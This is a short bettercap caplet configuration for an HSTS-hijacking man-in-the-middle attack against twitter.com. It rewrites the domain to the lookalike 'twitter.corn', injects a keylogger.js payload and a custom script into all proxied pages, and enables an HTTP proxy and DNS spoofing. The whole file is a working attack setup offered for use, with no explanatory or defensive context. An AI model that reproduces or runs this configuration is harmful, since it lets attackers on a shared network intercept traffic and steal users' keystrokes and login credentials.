set hstshijack.log          /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore       *
set hstshijack.targets      twitter.com,*.twitter.com
set hstshijack.replacements twitter.corn,*.twitter.corn
set hstshijack.obfuscate    false
set hstshijack.encode       false
set hstshijack.payloads     *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js,:/root/script.js


set http.proxy.script       /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains       twitter.corn,*.twitter.com

http.proxy  on
dns.spoof   on

